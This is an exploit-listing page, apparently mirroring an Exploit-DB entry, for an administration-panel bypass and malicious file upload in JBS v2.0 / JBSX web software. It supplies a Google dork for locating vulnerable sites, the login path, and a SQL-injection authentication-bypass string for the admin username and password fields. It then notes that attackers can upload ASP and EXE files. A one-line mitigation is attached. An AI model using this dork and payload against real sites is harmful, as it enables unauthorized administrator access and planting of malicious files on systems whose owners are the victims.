header-logo
Suggest Exploit
vendor:
JBS v2.0 JBSX and other Jiro's Products
by:
blackenedsecurity
8.3
CVSS
HIGH
Administration panel bypass and Malicious File Upload
264
CWE
Product Name: JBS v2.0 JBSX and other Jiro's Products
Affected Version From: JBS v2.0 JBSX
Affected Version To: Other Jiro's Products
Patch Exists: Unknown
Related CWE: None
CPE: None
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: None
Unknown

Administration panel bypass and Malicious File Upload Vulnerability

H4ckers may upload malicious files by using upload panel as they have administrator access. They are able to change settings and upload asp and exe files.

Mitigation:

Ensure that the application is properly configured to prevent unauthorized access to the administration panel and malicious file uploads.
Source

Exploit-DB raw data:

# Administration panel bypass and Malicious File Upload Vulnerability
# JBS v2.0 JBSX and other Jiro's Products
# Google Dork: "inurl:/files/redirect.asp"


Go to url files/login.asp

admin 'or' '='    
password 'or' '='

H4ckers may upload malicious files by using upload panel as they have administrator acces
they are able to change settings and upload asp and exe files.


# Bug discovered by blackenedsecurity
# http://blackenedsecurity.blogcu.com
# msn: syberhunter@hotmail.com
# From Turkey =)

Navigation

Suggest Exploit

Services By CQR